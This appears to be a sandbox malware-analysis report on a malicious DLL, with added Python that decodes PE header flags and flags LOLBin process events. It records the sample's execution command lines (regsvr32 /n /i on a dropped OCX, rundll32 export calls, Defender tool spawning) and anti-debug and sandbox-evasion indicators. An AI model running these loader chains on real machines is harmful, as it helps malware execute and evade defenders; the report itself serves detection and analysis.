Source: useraccount.aspx.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
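The two static PE lines in this section (the file-header characteristics EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL and the .text section flags IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ) can be checked on the file itself without a full PE library. The script below is an added example, not part of this report or of the sandbox: it walks the DOS header, PE signature, COFF file header and section table with struct and decodes the same flag names from winnt.h. build_sample_dll constructs a headers-only image inline with exactly those flag values so the script runs offline; pass the real DLL path as the first argument to parse it instead. Function names are this example's own.

```python
import struct
import sys

# IMAGE_FILE_HEADER.Characteristics bits (winnt.h), the ones the report names
FILE_CHARACTERISTICS = {
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}

# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h)
SECTION_CHARACTERISTICS = {
    0x00000020: "IMAGE_SCN_CNT_CODE",
    0x00000040: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    0x00000080: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    0x20000000: "IMAGE_SCN_MEM_EXECUTE",
    0x40000000: "IMAGE_SCN_MEM_READ",
    0x80000000: "IMAGE_SCN_MEM_WRITE",
}


def decode_flags(value: int, table: dict) -> list:
    """Names of the bits in `table` that are set in `value`, lowest bit first."""
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data: bytes) -> dict:
    """Walk MZ header -> PE signature -> COFF header -> section table and decode the flags."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, _ts, _symtab, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    sect_table = coff + 20 + opt_size          # section headers follow the optional header (PE32 or PE32+)
    sections = []
    for i in range(nsections):
        fields = struct.unpack_from("<8sIIIIIIHHI", data, sect_table + 40 * i)
        name, sec_chars = fields[0], fields[9]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "flags": decode_flags(sec_chars, SECTION_CHARACTERISTICS),
        })
    return {
        "machine": machine,
        "characteristics": decode_flags(chars, FILE_CHARACTERISTICS),
        "sections": sections,
    }


def suspicious_section_flags(pe: dict) -> list:
    """Sections that are both writable and executable, which no normal compiler emits."""
    return [s["name"] for s in pe["sections"]
            if "IMAGE_SCN_MEM_WRITE" in s["flags"] and "IMAGE_SCN_MEM_EXECUTE" in s["flags"]]


def build_sample_dll() -> bytes:
    """Constructed, headers-only 32-bit PE carrying the flag values the report lists."""
    e_lfanew = 0x40
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt_size = 0xE0                            # sizeof(IMAGE_OPTIONAL_HEADER32)
    file_chars = 0x0002 | 0x0020 | 0x0100 | 0x2000
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, file_chars)   # 0x14C = i386
    optional = struct.pack("<H", 0x10B).ljust(opt_size, b"\0")               # PE32 magic, rest zeroed
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x1000, 0x1000, 0x200, 0x400, 0, 0, 0, 0,
                       0x00000020 | 0x20000000 | 0x40000000)
    return dos + b"PE\0\0" + coff + optional + text


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dll()
    print(parse_pe(blob))
```

The flag set the report prints is what any ordinary compiler-built 32-bit DLL carries, so on its own it says nothing about maliciousness; the verdict on this sample rests on the Yara matches and the runtime behaviour. What would be worth flagging at this stage is the opposite: a file loaded as a DLL whose header lacks the DLL bit, or a code section that is also IMAGE_SCN_MEM_WRITE, which is what suspicious_section_flags reports.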
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInit
Source: useraccount.aspx.dll Virustotal: Detection: 27%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInitialize
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInstall
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInit
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInitialize
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInstall
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_setopt
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_perform
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_init
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_cleanup
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",_Uninitialize
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",UnregisterDll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Uninitialize
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",ThreadFunction
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Main
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Init
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",ExportDll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Export
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllUninitialize
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7584 -s 612
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
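The process-creation lines above carry the behaviours a responder would hunt for outside the sandbox: regsvr32 started with -n -i: on an .ocx dropped under the user profile (with /n, DllRegisterServer is skipped and DllInstall is called on the module), Windows Defender's MpCmdRun.exe -wdenable spawned by rundll32.exe, and a mutex named 8f08 that matches the 8f08 directory the sample created. The Python below is an added example, not part of this report or of the sandbox: it runs those checks over constructed process events copied from the lines above plus one benign control, and pairs mutex names with created directories. The event shape (ProcEvent), the rule wording and the set of paths treated as user-writable are this example's assumptions. Note that the loaddll32.exe parent and the one-rundll32-per-export invocations (DllInit, curl_easy_init, Main and so on) are the sandbox exercising the DLL's export table; on an endpoint you would expect a single rundll32 or regsvr32 launch from a user-driven parent.

```python
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # parent image path ("unknown" when the sandbox could not attribute it)
    image: str     # created process image path
    cmdline: str   # full command line


# Paths a standard user can write to; a DLL/OCX run from here by a LOLBin deserves a look.
USER_WRITABLE = re.compile(r"^[A-Z]:\\(?:Users|ProgramData|Windows\\Temp)\\", re.I)

# Constructed events, copied from the process-creation lines in this report, plus one benign control.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\loaddll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r'rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInit'),
    ProcEvent("unknown", r"C:\Windows\System32\regsvr32.exe",
              r'C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" '
              r'"C:\Users\user\8f08\user-PC\user-PC.ocx"'),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Program Files\Windows Defender\MpCmdRun.exe",
              r'"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable'),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\WerFault.exe",
              r"C:\Windows\SysWOW64\WerFault.exe -u -p 7584 -s 612"),
    ProcEvent(r"C:\Program Files\Vendor\setup.exe", r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32.exe /s "C:\Program Files\Vendor\control.ocx"'),   # benign control (hypothetical)
]


def detect(ev: ProcEvent) -> list[str]:
    """Apply the three process-creation checks to one event; return the findings (empty = clean)."""
    findings = []
    image = ev.image.lower()
    parent = ev.parent.lower()
    # 1. regsvr32 /n /i:<module>: DllRegisterServer is skipped and DllInstall runs on the module;
    #    flag it when the module lives in a user-writable directory.
    if image.endswith("\\regsvr32.exe"):
        m = re.search(r'[-/]i:"?([^"\s]+)', ev.cmdline)
        if m and re.search(r"[-/]n\b", ev.cmdline) and USER_WRITABLE.match(m.group(1)):
            findings.append(f"regsvr32 DllInstall of user-writable module: {m.group(1)}")
    # 2. rundll32 calling an export of a DLL/OCX that sits in a user-writable directory.
    if image.endswith("\\rundll32.exe"):
        m = re.search(r'rundll32(?:\.exe)?\s+"?([^",]+\.(?:dll|ocx))"?,', ev.cmdline, re.I)
        if m and USER_WRITABLE.match(m.group(1)):
            findings.append(f"rundll32 export call on user-writable DLL: {m.group(1)}")
    # 3. Defender's command-line tool started by a LOLBin parent instead of by Defender itself.
    if image.endswith("\\mpcmdrun.exe") and "-wdenable" in ev.cmdline.lower():
        if parent.endswith(("\\rundll32.exe", "\\regsvr32.exe")):
            findings.append(f"MpCmdRun -wdenable spawned by {ev.parent}")
    return findings


def scan(events: list[ProcEvent]) -> list[list[str]]:
    """One findings list per event, in input order."""
    return [detect(ev) for ev in events]


def correlate_mutex_with_dir(mutants: list[str], created_dirs: list[str]) -> list[tuple[str, str]]:
    """Pair each mutex whose leaf name equals the basename of a directory the sample created."""
    by_name = {d.rstrip("\\").rsplit("\\", 1)[-1].lower(): d for d in created_dirs}
    hits = []
    for m in mutants:
        leaf = m.rsplit("\\", 1)[-1].lower()
        if leaf in by_name:
            hits.append((m, by_name[leaf]))
    return hits


if __name__ == "__main__":
    for ev, found in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(ev.image, "->", found or "clean")
    print(correlate_mutex_with_dir(
        [r"\Sessions\1\BaseNamedObjects\8f08", r"\BaseNamedObjects\Local\SM0:7764:120:WilError_03"],
        [r"C:\Users\user\8f08"]))
```

The WerFault.exe line is left unflagged on purpose: it is Windows Error Reporting collecting a crash of one of the rundll32 instances (PID 7584), and a rule on it would only reproduce the crash rather than the sample. The mutex-to-directory pairing is a pivot, not a detection; it tells you which mutex name to look for on other hosts once you know the directory name the dropper used.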
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInit
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInitialize
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\useraccount.aspx.dll,DllInstall
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInit
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInitialize
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllInstall
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_setopt
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_perform
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_init
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",curl_easy_cleanup
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",_Uninitialize
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",UnregisterDll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Uninitialize
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",ThreadFunction
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Main
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Init
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",ExportDll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",Export
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",DllUninitialize
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1
Source: C:\Windows\System32\regsvr32.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: wldp.dll
Source: C:\Windows\System32\loaddll32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: msi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ncryptsslp.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: useraccount.aspx.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Source: Yara match File source: useraccount.aspx.dll, type: SAMPLE
Source: Yara match File source: 36.2.regsvr32.exe.7f0b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.7ed90000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.7ed90000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.regsvr32.exe.7f0b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.6cef0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.7f770000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.regsvr32.exe.6b4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.52c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.7f770000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.52c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2508577528.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE03586 push ecx; ret 13_2_7EE03599
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_7F7E3586 push ecx; ret 18_2_7F7E3599
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 36_2_7F123586 push ecx; ret 36_2_7F123599
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\8f08\user-PC\user-PC.ocx

Hooking and other Techniques for Hiding and Protection

Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 4433
Source: unknown Network traffic detected: HTTP traffic on port 4433 -> 49710
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetAdaptersInfo, 13_2_7EDE8C30
Source: C:\Windows\SysWOW64\rundll32.exe Window / User API: foregroundWindowGot 874
Source: C:\Windows\SysWOW64\regsvr32.exe Window / User API: foregroundWindowGot 875
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Users\user\8f08\user-PC\user-PC.ocx
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\regsvr32.exe API coverage: 0.0 %
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7288 Thread sleep count: 96 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7288 Thread sleep time: -12480000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE8780 GetSystemInfo, 13_2_7EDE8780
Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
Source: C:\Windows\SysWOW64\rundll32.exe Thread delayed: delay time: 130000
Source: rundll32.exe, 0000000D.00000003.1392652563.000000000570D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ZTOJcUlTUW1aOTU+/PvgsSHSh7gMPqYBL4au5h9qMu51NPvmcix0zDwiiXJJcFFt
Source: rundll32.exe, 0000000D.00000003.1392652563.000000000570D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cfuNua4s2oHZikvmCIgeaGRZPRANIrEH7Qx3faVzu/U8KOC2n1zUotY6XrkUbdKV
Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW4E
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EE03887 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_7EE03887
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_6CF4D480 mov eax, dword ptr fs:[00000030h] 13_2_6CF4D480
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDB9F44 mov edx, dword ptr fs:[00000030h] 13_2_7EDB9F44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE8C30 mov ecx, dword ptr fs:[00000030h] 13_2_7EDE8C30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE8C30 mov eax, dword ptr fs:[00000030h] 13_2_7EDE8C30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDE8C30 mov edx, dword ptr fs:[00000030h] 13_2_7EDE8C30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h] 13_2_7EDF1D60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_7EDF1D60 mov edx, dword ptr fs:[00000030h] 13_2_7EDF1D60
